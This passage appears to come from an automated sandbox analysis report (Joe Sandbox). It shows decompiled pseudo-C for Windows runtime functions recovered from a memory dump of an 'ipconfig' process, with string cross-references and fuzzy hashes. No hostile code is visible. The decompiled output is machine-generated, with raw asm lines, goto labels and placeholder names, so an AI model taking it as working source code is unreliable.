              											_push(_t174);
              											__eflags = _t170 & 0x00000301;
              											if((_t170 & 0x00000301) == 0) {
              												_t176 = _a8;
              												__eflags = _t176;
              												if(__eflags == 0) {
              													L64:
              													_t83 =  *[fs:0x18];
              													_t177 = 0;
              													__eflags =  *(_t83 + 0xfb8);
              													if( *(_t83 + 0xfb8) != 0) {
              														E02EA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
              													}
              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
              													goto L15;
              												} else {
              													asm("sbb edx, edx");
              													_t114 = E02F38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
              													__eflags = _t114;
              													if(_t114 < 0) {
              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
              														E02E9B150();
              													}
              													_t116 = E02F36D81(_t176,  &_v16);
              													__eflags = _t116;
              													if(_t116 >= 0) {
              														__eflags = _v16 - 2;
              														if(_v16 < 2) {
              															L56:
              															_t118 = E02EA75CE(_v20, 5, 0);
              															__eflags = _t118;
              															if(_t118 < 0) {
              																L67:
              																_t130 = 0xc0000017;
              																goto L32;
              															} else {
              																__eflags = _v12;
              																if(_v12 == 0) {
              																	goto L67;
              																} else {
              																	_t153 =  *0x2f88638; // 0x0
              																	_t122 = L02EA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
              																	_t154 = _v12;
              																	_t130 = _t122;
              																	__eflags = _t130;
              																	if(_t130 >= 0) {
              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
              																		__eflags = _t123;
              																		if(_t123 != 0) {
              																			_t155 = _a12;
              																			__eflags = _t155;
              																			if(_t155 != 0) {
              																				 *_t155 = _t123;
              																			}
              																			goto L64;
              																		} else {
              																			E02EA76E2(_t154);
              																			goto L41;
              																		}
              																	} else {
              																		E02EA76E2(_t154);
              																		_t177 = 0;
              																		goto L18;
              																	}
              																}
              															}
              														} else {
              															__eflags =  *_t176;
              															if( *_t176 != 0) {
              																goto L56;
              															} else {
              																__eflags =  *(_t176 + 2);
              																if( *(_t176 + 2) == 0) {
              																	goto L64;
              																} else {
              																	goto L56;
              																}
              															}
              														}
              													} else {
              														_t130 = 0xc000000d;
              														goto L32;
              													}
              												}
              												goto L35;
              											} else {
              												__eflags = _a8;
              												if(_a8 != 0) {
              													_t77 = 0xc000000d;
              												} else {
              													_v5 = 1;
              													L02ECFCE3(_v20, _t170);
              													_t177 = 0;
              													__eflags = 0;
              													L15:
              													_t85 =  *[fs:0x18];
              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
              														L18:
              														__eflags = _t130;
              														if(_t130 != 0) {
              															goto L32;
              														} else {
              															__eflags = _v5 - _t130;
              															if(_v5 == _t130) {
              																goto L32;
              															} else {
              																_t86 =  *[fs:0x18];
              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
              																}
              																__eflags = _t177;
              																if(_t177 == 0) {
              																	L31:
              																	__eflags = 0;
              																	L02EA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
              																	goto L32;
              																} else {
              																	__eflags = _v24;
              																	_t91 =  *(_t177 + 0x20);
              																	if(_v24 != 0) {
              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
              																		goto L31;
              																	} else {
              																		_t141 = _t91 & 0x00000040;
              																		__eflags = _t170 & 0x00000100;
              																		if((_t170 & 0x00000100) == 0) {
              																			__eflags = _t141;
              																			if(_t141 == 0) {
              																				L74:
              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
              																				goto L27;
              																			} else {
              																				_t177 = E02ECFD22(_t177);
              																				__eflags = _t177;
              																				if(_t177 == 0) {
              																					goto L42;
              																				} else {
              																					_t130 = E02ECFD9B(_t177, 0, 4);
              																					__eflags = _t130;
              																					if(_t130 != 0) {
              																						goto L42;
              																					} else {
              																						_t68 = _t177 + 0x20;
              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
              																						__eflags =  *_t68;
              																						_t91 =  *(_t177 + 0x20);
              																						goto L74;
              																					}
              																				}
              																			}
              																			goto L35;
              																		} else {
              																			__eflags = _t141;
              																			if(_t141 != 0) {
              																				_t177 = E02ECFD22(_t177);
              																				__eflags = _t177;
              																				if(_t177 == 0) {
              																					L42:
              																					_t77 = 0xc0000001;
              																					goto L33;
              																				} else {
              																					_t130 = E02ECFD9B(_t177, 0, 4);
              																					__eflags = _t130;
              																					if(_t130 != 0) {
              																						goto L42;
              																					} else {
              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
              																						_t91 =  *(_t177 + 0x20);
              																						goto L26;
              																					}
              																				}
              																				goto L35;
              																			} else {
              																				L26:
              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
              																				__eflags = _t94;
              																				L27:
              																				 *(_t177 + 0x20) = _t94;
              																				__eflags = _t170 & 0x00008000;
              																				if((_t170 & 0x00008000) != 0) {
              																					_t95 = _a12;
              																					__eflags = _t95;
              																					if(_t95 != 0) {
              																						_t96 =  *_t95;
              																						__eflags = _t96;
              																						if(_t96 != 0) {
              																							 *((short*)(_t177 + 0x22)) = 0;
              																							_t40 = _t177 + 0x20;
              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
              																							__eflags =  *_t40;
              																						}
              																					}
              																				}
              																				goto L31;
              																			}
              																		}
              																	}
              																}
              															}
              														}
              													} else {
              														_t147 =  *( *[fs:0x18] + 0xfc0);
              														_t106 =  *(_t147 + 0x20);
              														__eflags = _t106 & 0x00000040;
              														if((_t106 & 0x00000040) != 0) {
              															_t147 = E02ECFD22(_t147);
              															__eflags = _t147;
              															if(_t147 == 0) {
              																L41:
              																_t130 = 0xc0000001;
              																L32:
              																_t77 = _t130;
              																goto L33;
              															} else {
              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
              																_t106 =  *(_t147 + 0x20);
              																goto L17;
              															}
              															goto L35;
              														} else {
              															L17:
              															_t108 = _t106 | 0x00000080;
              															__eflags = _t108;
              															 *(_t147 + 0x20) = _t108;
              															 *( *[fs:0x18] + 0xfc0) = _t147;
              															goto L18;
              														}
              													}
              												}
              											}
              											L33:
              										}
              									}
              								}
              							}
              						}
              						L35:
              						return _t77;
              					} else {
              						 *_t75 = 0x2f87b80;
              						 *((intOrPtr*)(_t75 + 4)) = _t134;
              						 *_t134 = _t75;
              						 *0x2f87b84 = _t75;
              						_t73 = E02EAEB70(_t134, 0x2f87b60);
              						if( *0x2f87b20 != 0) {
              							_t73 =  *( *[fs:0x30] + 0xc);
              							if( *((char*)(_t73 + 0x28)) == 0) {
              								_t73 = E02EAFF60( *0x2f87b20);
              							}
              						}
              						goto L5;
              					}
              				}
              			}

              Strings
              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02F0BE0F
              • P1@, xrefs: 02ECFAF1
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$P1@
              • API String ID: 0-600707448
              • Opcode ID: 29d36bad11dfd72a32abf32e89d5fe3e11279dacda998e02b78f7f18db8e561a
              • Instruction ID: 31b3431f7ca9b181139812a4dc6a201f541d384c8221f91ea00cd660dbf9eedc
              • Opcode Fuzzy Hash: 29d36bad11dfd72a32abf32e89d5fe3e11279dacda998e02b78f7f18db8e561a
              • Instruction Fuzzy Hash: 7AA10831B40706CBDB25DBA4C590BBEF3A6AF44758F24956FE906DBA80DB30D802CB44
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E02F5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
              				signed int _v20;
              				char _v24;
              				signed int _v40;
              				char _v44;
              				intOrPtr _v48;
              				signed int _v52;
              				unsigned int _v56;
              				char _v60;
              				signed int _v64;
              				char _v68;
              				signed int _v72;
              				void* __ebx;
              				void* __edi;
              				char _t87;
              				signed int _t90;
              				signed int _t94;
              				signed int _t100;
              				intOrPtr* _t113;
              				signed int _t122;
              				void* _t132;
              				void* _t135;
              				signed int _t139;
              				signed int* _t141;
              				signed int _t146;
              				signed int _t147;
              				void* _t153;
              				signed int _t155;
              				signed int _t159;
              				char _t166;
              				void* _t172;
              				void* _t176;
              				signed int _t177;
              				intOrPtr* _t179;
              
              				_t179 = __ecx;
              				_v48 = __edx;
              				_v68 = 0;
              				_v72 = 0;
              				_push(__ecx[1]);
              				_push( *__ecx);
              				_push(0);
              				_t153 = 0x14;
              				_t135 = _t153;
              				_t132 = E02F5BBBB(_t135, _t153);
              				if(_t132 == 0) {
              					_t166 = _v68;
              					goto L43;
              				} else {
              					_t155 = 0;
              					_v52 = 0;
              					asm("stosd");
              					asm("stosd");
              					asm("stosd");
              					asm("stosd");
              					asm("stosd");
              					_v56 = __ecx[1];
              					if( *__ecx >> 8 < 2) {
              						_t155 = 1;
              						_v52 = 1;
              					}
              					_t139 = _a4;
              					_t87 = (_t155 << 0xc) + _t139;
              					_v60 = _t87;
              					if(_t87 < _t139) {
              						L11:
              						_t166 = _v68;
              						L12:
              						if(_t132 != 0) {
              							E02F5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
              						}
              						L43:
              						if(_v72 != 0) {
              							_push( *((intOrPtr*)(_t179 + 4)));
              							_push( *_t179);
              							_push(0x8000);
              							E02F5AFDE( &_v72,  &_v60);
              						}
              						L46:
              						return _t166;
              					}
              					_t90 =  *(_t179 + 0xc) & 0x40000000;
              					asm("sbb edi, edi");
              					_t172 = ( ~_t90 & 0x0000003c) + 4;
              					if(_t90 != 0) {
              						_push(0);
              						_push(0x14);
              						_push( &_v44);
              						_push(3);
              						_push(_t179);
              						_push(0xffffffff);
              						if(E02ED9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
              							_push(_t139);
              							E02F5A80D(_t179, 1, _v40, 0);
              							_t172 = 4;
              						}
              					}
              					_t141 =  &_v72;
              					if(E02F5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
              						_v64 = _a4;
              						_t94 =  *(_t179 + 0xc) & 0x40000000;
              						asm("sbb edi, edi");
              						_t176 = ( ~_t94 & 0x0000003c) + 4;
              						if(_t94 != 0) {
              							_push(0);
              							_push(0x14);
              							_push( &_v24);
              							_push(3);
              							_push(_t179);
              							_push(0xffffffff);
              							if(E02ED9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
              								_push(_t141);
              								E02F5A80D(_t179, 1, _v20, 0);
              								_t176 = 4;
              							}
              						}
              						if(E02F5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
              							goto L11;
              						} else {
              							_t177 = _v64;
              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
              							_t100 = _v52 + _v52;
              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
              							 *(_t132 + 0x10) = _t146;
              							asm("bsf eax, [esp+0x18]");
              							_v52 = _t100;
              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
              							_t47 =  &_a8;
              							 *_t47 = _a8 & 0x00000001;
              							if( *_t47 == 0) {
              								E02EB2280(_t179 + 0x30, _t179 + 0x30);
              							}
              							_t147 =  *(_t179 + 0x34);
              							_t159 =  *(_t179 + 0x38) & 1;
              							_v68 = 0;
              							if(_t147 == 0) {
              								L35:
              								E02EAB090(_t179 + 0x34, _t147, _v68, _t132);
              								if(_a8 == 0) {
              									E02EAFFB0(_t132, _t177, _t179 + 0x30);
              								}
              								asm("lock xadd [eax], ecx");
              								asm("lock xadd [eax], edx");
              								_t132 = 0;
              								_v72 = _v72 & 0;
              								_v68 = _v72;
              								if(E02EB7D50() == 0) {
              									_t113 = 0x7ffe0388;
              								} else {
              									_t177 = _v64;
              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
              								}
              								if( *_t113 == _t132) {
              									_t166 = _v68;
              									goto L46;
              								} else {
              									_t166 = _v68;
              									E02F4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
              									goto L12;
              								}
              							} else {
              								L23:
              								while(1) {
              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
              										_t122 =  *_t147;
              										if(_t159 == 0) {
              											L32:
              											if(_t122 == 0) {
              												L34:
              												_v68 = 0;
              												goto L35;
              											}
              											L33:
              											_t147 = _t122;
              											continue;
              										}
              										if(_t122 == 0) {
              											goto L34;
              										}
              										_t122 = _t122 ^ _t147;
              										goto L32;
              									}
              									_t122 =  *(_t147 + 4);
              									if(_t159 == 0) {
              										L27:
              										if(_t122 != 0) {
              											goto L33;
              										}
              										L28:
              										_v68 = 1;
              										goto L35;
              									}
              									if(_t122 == 0) {
              										goto L28;
              									}
              									_t122 = _t122 ^ _t147;
              									goto L27;
              								}
              							}
              						}
              					}
              					_v72 = _v72 & 0x00000000;
              					goto L11;
              				}
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: `$`
              • API String ID: 0-197956300
              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
              • Instruction ID: 859cc4e49f8809c6a2c76fec270c8ddc4549dd09deec4fa64f6e5777f706ede6
              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
              • Instruction Fuzzy Hash: 4B918E716043559BE724CE25C841B1BB7E6AF84798F14892DFBA9CB280E774EA04CF51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E02F151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
              				signed short* _t63;
              				signed int _t64;
              				signed int _t65;
              				signed int _t67;
              				intOrPtr _t74;
              				intOrPtr _t84;
              				intOrPtr _t88;
              				intOrPtr _t94;
              				void* _t100;
              				void* _t103;
              				intOrPtr _t105;
              				signed int _t106;
              				short* _t108;
              				signed int _t110;
              				signed int _t113;
              				signed int* _t115;
              				signed short* _t117;
              				void* _t118;
              				void* _t119;
              
              				_push(0x80);
              				_push(0x2f705f0);
              				E02EED0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
              				_t115 =  *(_t118 + 0xc);
              				 *(_t118 - 0x7c) = _t115;
              				 *((char*)(_t118 - 0x65)) = 0;
              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
              				_t113 = 0;
              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
              				 *((intOrPtr*)(_t118 - 4)) = 0;
              				_t100 = __ecx;
              				if(_t100 == 0) {
              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
              					E02EAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
              					 *((char*)(_t118 - 0x65)) = 1;
              					_t63 =  *(_t118 - 0x90);
              					_t101 = _t63[2];
              					_t64 =  *_t63 & 0x0000ffff;
              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
              					L20:
              					_t65 = _t64 >> 1;
              					L21:
              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
              					if(_t108 == 0) {
              						L27:
              						 *_t115 = _t65 + 1;
              						_t67 = 0xc0000023;
              						L28:
              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
              						L29:
              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
              						E02F153CA(0);
              						return E02EED130(0, _t113, _t115);
              					}
              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
              							 *_t108 = 0;
              						}
              						goto L27;
              					}
              					 *_t115 = _t65;
              					_t115 = _t65 + _t65;
              					E02EDF3E0(_t108, _t101, _t115);
              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
              					_t67 = 0;
              					goto L28;
              				}
              				_t103 = _t100 - 1;
              				if(_t103 == 0) {
              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
              					_t74 = E02EB3690(1, _t117, 0x2e71810, _t118 - 0x74);
              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
              					_t101 = _t117[2];
              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
              					if(_t74 < 0) {
              						_t64 =  *_t117 & 0x0000ffff;
              						_t115 =  *(_t118 - 0x7c);
              						goto L20;
              					}
              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
              					_t115 =  *(_t118 - 0x7c);
              					goto L21;
              				}
              				if(_t103 == 1) {
              					_t105 = 4;
              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
              					_push(_t118 - 0x70);
              					_push(0);
              					_push(0);
              					_push(_t105);
              					_push(_t118 - 0x78);
              					_push(0x6b);
              					 *((intOrPtr*)(_t118 - 0x64)) = E02EDAA90();
              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
              					_t113 = L02EB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
              					if(_t113 != 0) {
              						_push(_t118 - 0x70);
              						_push( *((intOrPtr*)(_t118 - 0x70)));
              						_push(_t113);
              						_push(4);
              						_push(_t118 - 0x78);
              						_push(0x6b);
              						_t84 = E02EDAA90();
              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
              						if(_t84 < 0) {
              							goto L29;
              						}
              						_t110 = 0;
              						_t106 = 0;
              						while(1) {
              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
              							 *(_t118 - 0x88) = _t106;
              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
              								break;
              							}
              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
              							_t106 = _t106 + 1;
              						}
              						_t88 = E02F1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
              						_t119 = _t119 + 0x1c;
              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
              						if(_t88 < 0) {
              							goto L29;
              						}
              						_t101 = _t118 - 0x3c;
              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
              						goto L21;
              					}
              					_t67 = 0xc0000017;
              					goto L28;
              				}
              				_push(0);
              				_push(0x20);
              				_push(_t118 - 0x60);
              				_push(0x5a);
              				_t94 = E02ED9860();
              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
              				if(_t94 < 0) {
              					goto L29;
              				}
              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
              					_t101 = L"Legacy";
              					_push(6);
              				} else {
              					_t101 = L"UEFI";
              					_push(4);
              				}
              				_pop(_t65);
              				goto L21;
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: Legacy$UEFI
              • API String ID: 2994545307-634100481
              • Opcode ID: cb96a61fa16b6967ea184b7c44cd7c6c987d41662c1a8f54bd1f6b5599db2d5c
              • Instruction ID: 6b142d05a748d33bd0c7ccc2181f9303e60364611fad3214fad88200222d22df
              • Opcode Fuzzy Hash: cb96a61fa16b6967ea184b7c44cd7c6c987d41662c1a8f54bd1f6b5599db2d5c
              • Instruction Fuzzy Hash: 5B517D72E406089FDB24DFA8C850BAEB7FAFF88744F94806DE609EB251D7719901CB10
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E02E9B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
              				signed int _t65;
              				signed short _t69;
              				intOrPtr _t70;
              				signed short _t85;
              				void* _t86;
              				signed short _t89;
              				signed short _t91;
              				intOrPtr _t92;
              				intOrPtr _t97;
              				intOrPtr* _t98;
              				signed short _t99;
              				signed short _t101;
              				void* _t102;
              				char* _t103;
              				signed short _t104;
              				intOrPtr* _t110;
              				void* _t111;
              				void* _t114;
              				intOrPtr* _t115;
              
              				_t109 = __esi;
              				_t108 = __edi;
              				_t106 = __edx;
              				_t95 = __ebx;
              				_push(0x90);
              				_push(0x2f6f7a8);
              				E02EED0E8(__ebx, __edi, __esi);
              				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
              				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
              				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
              				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
              				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
              				if(__edx == 0xffffffff) {
              					L6:
              					_t97 =  *((intOrPtr*)(_t114 - 0x78));
              					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
              					__eflags = _t65 & 0x00000002;
              					if((_t65 & 0x00000002) != 0) {
              						L3:
              						L4:
              						return E02EED130(_t95, _t108, _t109);
              					}
              					 *(_t97 + 0xfca) = _t65 | 0x00000002;
              					_t108 = 0;
              					_t109 = 0;
              					_t95 = 0;
              					__eflags = 0;
              					while(1) {
              						__eflags = _t95 - 0x200;
              						if(_t95 >= 0x200) {
              							break;
              						}
              						E02EDD000(0x80);
              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
              						_t108 = _t115;
              						_t95 = _t95 - 0xffffff80;
              						_t17 = _t114 - 4;
              						 *_t17 =  *(_t114 - 4) & 0x00000000;
              						__eflags =  *_t17;
              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
              						_t102 = _t110 + 1;
              						do {
              							_t85 =  *_t110;
              							_t110 = _t110 + 1;
              							__eflags = _t85;
              						} while (_t85 != 0);
              						_t111 = _t110 - _t102;
              						_t21 = _t95 - 1; // -129
              						_t86 = _t21;
              						__eflags = _t111 - _t86;
              						if(_t111 > _t86) {
              							_t111 = _t86;
              						}
              						E02EDF3E0(_t108, _t106, _t111);
              						_t115 = _t115 + 0xc;
              						_t103 = _t111 + _t108;
              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
              						_t89 = _t95 - _t111;
              						__eflags = _t89;
              						_push(0);
              						if(_t89 == 0) {
              							L15:
              							_t109 = 0xc000000d;
              							goto L16;
              						} else {
              							__eflags = _t89 - 0x7fffffff;
              							if(_t89 <= 0x7fffffff) {
              								L16:
              								 *(_t114 - 0x94) = _t109;
              								__eflags = _t109;
              								if(_t109 < 0) {
              									__eflags = _t89;
              									if(_t89 != 0) {
              										 *_t103 = 0;
              									}
              									L26:
              									 *(_t114 - 0xa0) = _t109;
              									 *(_t114 - 4) = 0xfffffffe;
              									__eflags = _t109;
              									if(_t109 >= 0) {
              										L31:
              										_t98 = _t108;
              										_t39 = _t98 + 1; // 0x1
              										_t106 = _t39;
              										do {
              											_t69 =  *_t98;
              											_t98 = _t98 + 1;
              											__eflags = _t69;
              										} while (_t69 != 0);
              										_t99 = _t98 - _t106;
              										__eflags = _t99;
              										L34:
              										_t70 =  *[fs:0x30];
              										__eflags =  *((char*)(_t70 + 2));
              										if( *((char*)(_t70 + 2)) != 0) {
              											L40:
              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
              											 *(_t114 - 4) = 1;
              											_push(_t114 - 0x74);
              											L02EEDEF0(_t99, _t106);
              											 *(_t114 - 4) = 0xfffffffe;
              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
              											goto L3;
              										}
              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
              											goto L40;
              										}
              										_push( *((intOrPtr*)(_t114 + 8)));
              										_push( *((intOrPtr*)(_t114 - 0x9c)));
              										_push(_t99 & 0x0000ffff);
              										_push(_t108);
              										_push(1);
              										_t101 = E02EDB280();
              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
              										if( *((char*)(_t114 + 0x14)) == 1) {
              											__eflags = _t101 - 0x80000003;
              											if(_t101 == 0x80000003) {
              												E02EDB7E0(1);
              												_t101 = 0;
              												__eflags = 0;
              											}
              										}
              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
              										goto L4;
              									}
              									__eflags = _t109 - 0x80000005;
              									if(_t109 == 0x80000005) {
              										continue;
              									}
              									break;
              								}
              								 *(_t114 - 0x90) = 0;
              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
              								_t91 = E02EDE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
              								_t115 = _t115 + 0x10;
              								_t104 = _t91;
              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
              								__eflags = _t104;
              								if(_t104 < 0) {
              									L21:
              									_t109 = 0x80000005;
              									 *(_t114 - 0x90) = 0x80000005;
              									L22:
              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
              									L23:
              									 *(_t114 - 0x94) = _t109;
              									goto L26;
              								}
              								__eflags = _t104 - _t92;
              								if(__eflags > 0) {
              									goto L21;
              								}
              								if(__eflags == 0) {
              									goto L22;
              								}
              								goto L23;
              							}
              							goto L15;
              						}
              					}
              					__eflags = _t109;
              					if(_t109 >= 0) {
              						goto L31;
              					}
              					__eflags = _t109 - 0x80000005;
              					if(_t109 != 0x80000005) {
              						goto L31;
              					}
              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
              					_t38 = _t95 - 1; // -129
              					_t99 = _t38;
              					goto L34;
              				}
              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
              					__eflags = __edx - 0x65;
              					if(__edx != 0x65) {
              						goto L2;
              					}
              					goto L6;
              				}
              				L2:
              				_push( *((intOrPtr*)(_t114 + 8)));
              				_push(_t106);
              				if(E02EDA890() != 0) {
              					goto L6;
              				}
              				goto L3;
              			}

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: _vswprintf_s
              • String ID:
              • API String ID: 677850445-0
              • Opcode ID: 70a7e0afb9c2a7f5b7e1b660d1e60552b0a916a65262eb00f75f705ad1b94fac
              • Instruction ID: f0f0687693681020277e18184106e139e56b65968f8debdd55217d6c55d81219
              • Opcode Fuzzy Hash: 70a7e0afb9c2a7f5b7e1b660d1e60552b0a916a65262eb00f75f705ad1b94fac
              • Instruction Fuzzy Hash: 7751D071E4029A8ADF75CF64C844BAEBBB1BF00718F1091ADEA59AB281D7704941CF90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02EBB944(signed int* __ecx, char __edx) {
              				signed int _v8;
              				signed int _v16;
              				signed int _v20;
              				char _v28;
              				signed int _v32;
              				char _v36;
              				signed int _v40;
              				intOrPtr _v44;
